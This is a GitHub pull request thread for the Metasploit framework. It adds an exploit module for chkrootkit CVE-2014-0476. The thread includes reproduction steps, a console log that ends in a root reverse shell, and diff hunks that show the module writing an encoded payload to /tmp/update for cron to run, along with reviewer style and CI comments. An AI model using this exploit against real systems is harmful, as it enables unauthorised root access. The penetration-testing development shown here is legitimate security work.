### PR TITLE
Add a module for a chkrootkit-powered privsec

### PR DESCRIPTION
**Pull request by jvoisin**
This modules implements an exploit for CVE-2014-0476, to gain root thanks to [chkrootkit](http://www.chkrootkit.org).

Its main issues is that you need to wait until chkrootkit is executed in a crontab (or manually), which can take 24h top with its default setup.

How to reproduce:
1. Install a [version < 0.50 of chkrootkit](ftp://ftp.pangeia.com.br/pub/seg/pac/chkrootkit-0.49.tar.gz)
2. Launch the local module
3. Wait until chkrootkit's crontab kicks in
4. You've got a root shell

```
msf > use exploit/linux/local/chkrootkit
msf exploit(chkrootkit) > check
[*] 192.168.1.25 - The target appears to be vulnerable.
msf exploit(chkrootkit) > run
[*] Exploit completed, but no session was created.

[*] Started reverse handler on 192.168.1.11:9999
msf exploit(chkrootkit) > [+] Target is vulnerable.
[!] Rooting depends of the crontab, this could take a while.
[*] Payload written to /tmp/update
[*] Waiting to chkrookit to be run be a cron tab...
[*] Command shell session 6 opened (192.168.1.11:9999 -> 192.168.1.25:40006) at 2015-11-06 20:53:00 +0100
[+] Deleted /tmp/update

msf exploit(chkrootkit) > sessions -i 6
[*] Starting interaction with 6...
id
uid=0(root) gid=0(root) groups=0(root)
```

### CODE REVIEW

**Comment by madmike33** [comment]
Works Great :)

**Comment by jvoisin** [comment]
I don't get why Travis isn't happy with my PR.

**Comment by madmike33** [comment]
there should be a reason ahahhaha that i also wonder :8ball:

**Comment by wvu-r7** [comment]
I'll check it out in a sec. This was a good vuln.

**Comment by shipcod3** [comment]
I tried to msftidy this one. Got no errors except that it needs a newline at the end of the file. Maybe you might want to add one at the end :)

**Comment by wvu-r7** [comment]
That's funny.

**Comment by jvoisin** [comment]
Done (from a smartphone !)

**Comment by shipcod3** [comment]
@jvoisin looks like the first update on adding the newline worked. The second update you did failed.

**Comment by wvu-r7** [comment]
I'm planning on cleaning this up anyway. Don't worry about it.

**Comment by jvoisin** [comment]
A new line in the payload ? Super-weird.
Anyway, than you @wvu-r7 :)

**Comment by wchen-r7** [comment]
Travis is failing on a problem that seems to be related to the pull request:

```
  1) modules it should behave like all modules with module type can be instantiated exploit linux/local/chkrootkit can be instantiated
     Failure/Error: load_and_create_module(
     NameError:
       uninitialized constant Msf::Exploit::Local::Linux
     Shared Example Group: "all modules with module type can be instantiated" called from ./spec/modules_spec.rb:16
     # ./modules/exploits/linux/local/chkrootkit.rb:14:in `<class:Metasploit4>'
     # ./modules/exploits/linux/local/chkrootkit.rb:6:in `module_eval_with_lexical_scope'
     # ./lib/msf/core/modules/loader/base.rb:55:in `module_eval'
     # ./lib/msf/core/modules/loader/base.rb:55:in `module_eval_with_lexical_scope'
     # ./lib/msf/core/modules/loader/base.rb:148:in `block in load_module'
     # ./lib/msf/core/modules/loader/base.rb:546:in `call'
     # ./lib/msf/core/modules/loader/base.rb:546:in `namespace_module_transaction'
     # ./lib/msf/core/modules/loader/base.rb:202:in `load_module'
     # ./spec/support/shared/contexts/msf/simple/framework/modules/loading.rb:92:in `expect_to_load_module_ancestor'
     # ./spec/support/shared/contexts/msf/simple/framework/modules/loading.rb:112:in `block in expect_to_load_module_ancestors'
     # ./spec/support/shared/contexts/msf/simple/framework/modules/loading.rb:111:in `each'
     # ./spec/support/shared/contexts/msf/simple/framework/modules/loading.rb:111:in `expect_to_load_module_ancestors'
     # ./spec/support/shared/contexts/msf/simple/framework/modules/loading.rb:150:in `load_and_create_module'
     # ./spec/support/shared/examples/all_modules_with_module_type_can_be_instantiated.rb:27:in `block (5 levels) in <top (required)>'
```

File: modules/exploits/linux/local/chkrootkit.rb [hunk 1]
```diff
@@ -0,0 +1,78 @@
...
+  def exploit
+    if check == Exploit::CheckCode::Safe
+      fail_with(Failure::NotVulnerable, "Target is not vulnerable.")
+    else
+      print_good("Target is vulnerable.")
+    end
+
+    print_warning('Rooting depends of the crontab, this could take a while.')
+
+    write_file("/tmp/update", cmd = "#!/bin/sh\n#{payload.encoded}\n")
```
Comment (wchen-r7) [inline modules/exploits/linux/local/chkrootkit.rb]: I don't think ```cmd = ``` is needed?

**Comment by wvu-r7** [comment]
@wchen-r7: Fixed on my end already. Will get to this as soon as I can. Have a slew of changes to this module.

File: modules/exploits/linux/local/chkrootkit.rb [hunk 2]
```diff
@@ -0,0 +1,78 @@
...
+      [
+        [ 'Generic', {} ],
+      ],
+      'Stance' => Msf::Exploit::Stance::Passive,
+      'DefaultTarget' => 0,}))
+  end
+
+  def check
+    res = cmd_exec('/usr/sbin/chkrootkit -V')
+    return Exploit::CheckCode::Appears if res && res =~ /chkrootkit version 0\.[^5]/
```
Comment (kernelsmith) [inline modules/exploits/linux/local/chkrootkit.rb]: you can skip the explicit returns:

```Ruby
if res && res =~ /chkrootkit version 0\.[^5]/
  Exploit::CheckCode::Appears
else
  Exploit::CheckCode::Safe
end
```

File: modules/exploits/linux/local/chkrootkit.rb [hunk 3]
```diff
@@ -0,0 +1,81 @@
...
+        [ 'BID', '67813' ],
+        [ 'CVE', '2014-0476' ],
+        [ 'CWE', '20' ],
+        [ 'EDB', '33899' ],
+        [ 'OSVDB', '107710' ],
+        [ 'URL', 'http://seclists.org/oss-sec/2014/q2/430' ],
+      ],
+      'DisclosureDate' => "Jun 28 2014",
+      'Arch'       => ARCH_CMD,
+      'DefaultOptions' => { 'WfsDelay' => 60*3600*24 },
```
Comment (wvu-r7) [inline modules/exploits/linux/local/chkrootkit.rb]: Pretty sure this isn't one day.

**Comment by wvu-r7** [comment]
Nice work with the RuboCop. Makes my life easier.

**Comment by wvu-r7** [comment]
I still have a series of fixes.

**Comment by wvu-r7** [comment]
Fixes here: https://github.com/rapid7/metasploit-framework/commit/657e50bb867120f5650ca85a985c9f541550f262. Thanks, everyone!

**Pull request merged**